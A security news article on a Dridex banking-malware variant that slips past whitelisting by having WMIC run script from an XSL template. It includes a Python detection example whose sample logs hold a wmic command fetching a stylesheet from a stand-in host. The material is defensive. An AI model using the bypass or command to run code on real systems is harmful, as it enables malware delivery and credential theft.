Dridex returns with new antivirus evasion - including application whitelisting

News by Rene Millman

The Dridex credential-stealing malware that targets banks continues to evolve and now uses an application whitelisting bypass technique to infect systems and evade most anti-virus defences.

A new variant of the Dridex malware has been spotted using antivirus evasion techniques in phishing emails.
According to security researchers, the new variant, discovered mid-June, uses an application whitelisting bypass technique to get around the common mitigation of disabling or blocking Windows Script Host. The technique takes advantage of the WMI command-line (WMIC) utility's weak execution policy around XSL scripts.
They said that Dridex has undergone numerous transformations as it has evolved over the last decade, first appearing as Cridex in 2011. The malware targets banking information on the victim system. It has since added other features, such as a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption.
Researchers also observed that the campaign using Dridex is evolving.
"Given the same-day deployment and implementation of the ssl-pert[.]com domain on June 26th and a tendency to utilise randomly generated variables and URL directories, it is probable the actors behind this variant of Dridex will continue to change up indicators throughout the current campaign," researchers said.
The malware was observed arriving through email in the form of a malicious document with embedded macros, according to researchers. Depending on the environment, the macros can be triggered by varying levels of employee interaction.
If the macros are successfully executed, they contact the ssl-pert[.]com domain to download servern.exe (the Dridex installer). The macro script uses an application whitelisting bypass technique first described in April of 2018 by Casey Smith (@subTee on Twitter).
Researchers said that JavaScript code embedded in an XSL template was executed by wmic with no integrity checks.
"eSentire’s Advance Threat Analytics team noted that the XSL script removes itself, then downloads and executes the Dridex installer," said researchers.
They added that given that email is the initial access point, employees are the first line of defence against this threat.
"Expect financial departments to be targeted by unsolicited invoices carrying malicious macros within. Some antivirus engines were able to detect (but not specify) the suspicious behavior. Given the rapid turnover of infrastructure and indicators, signature-based antivirus solutions will continue to have gaps throughout the Dridex campaign," they said.
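As an added illustration of the behaviour-based detection the researchers point to as an alternative to signatures (example code written for this article, not eSentire's or any vendor's tooling), the following Python scans process-creation records and flags wmic.exe being handed a remote or non-standard XSL stylesheet through /format, or being launched by an Office application. The pipe-separated log format, the field names and the sample lines are all constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Office binaries that should not normally be spawning WMIC in an enterprise.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Captures the /format value, quoted or bare (WMIC accepts /format:<value>).
FORMAT_RE = re.compile(r'/format[:=]\s*(?:"([^"]+)"|(\S+))', re.IGNORECASE)

# Constructed sample records: parent_image|image|command_line (not real telemetry).
SAMPLE_LOGS = [
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get caption /format:list",
    r'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|C:\Windows\System32\wbem\WMIC.exe|wmic process get /format:"http://example.invalid/template.xsl"',
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:C:\Users\Public\t.xsl",
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt",
]

@dataclass
class Finding:
    line_no: int
    reasons: List[str] = field(default_factory=list)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyse(record: Dict[str, str]) -> List[str]:
    """Return the reasons a single process-creation record looks suspicious."""
    reasons: List[str] = []
    if basename(record["image"]) != "wmic.exe":
        return reasons
    m = FORMAT_RE.search(record["command_line"])
    if m:
        target = (m.group(1) or m.group(2)).strip()
        if URL_RE.match(target):
            reasons.append(f"wmic /format fetches stylesheet from URL: {target}")
        elif target.lower().endswith(".xsl") and "\\system32\\wbem\\" not in target.lower():
            # Built-in formats (list, csv, ...) resolve to XSL files under wbem; anything else is odd.
            reasons.append(f"wmic /format uses non-standard XSL path: {target}")
    if basename(record["parent_image"]) in OFFICE_PARENTS:
        reasons.append(f"wmic spawned by Office process {basename(record['parent_image'])}")
    return reasons

def scan(lines: List[str]) -> List[Finding]:
    """Run analyse() over pipe-separated records and keep only the hits."""
    findings = []
    for i, line in enumerate(lines, 1):
        parent, image, cmd = line.split("|", 2)
        reasons = analyse({"parent_image": parent, "image": image, "command_line": cmd})
        if reasons:
            findings.append(Finding(i, reasons))
    return findings
```

Running scan(SAMPLE_LOGS) flags the second and third records only; the built-in /format:list invocation and the unrelated notepad launch pass.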
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that while the malware initially was only detected by a handful of companies, the number of antivirus products that can detect it will increase in the coming days.
"Because the initial infection comes as a result of an email which requires a user to interact with the attachment, the best form of defence is to provide appropriate user awareness training to users so that they can best identify and report such emails and, as a result, prevent the infection from occurring altogether," he said.
Jake Moore, cyber-security specialist at ESET, told SC Media UK that it feels as long as phishing emails have been around, Dridex has not been far behind.
"The simplest defence against this malware, yet not always possible, is to screen any unknown emails and to train staff to keep their eyes peeled for any strange looking communication as we can’t always rely purely on antivirus protection alone. Threat detection is making huge advances along with machine learning but is still in its immature phase to help thwart all attacks as seen here," he said.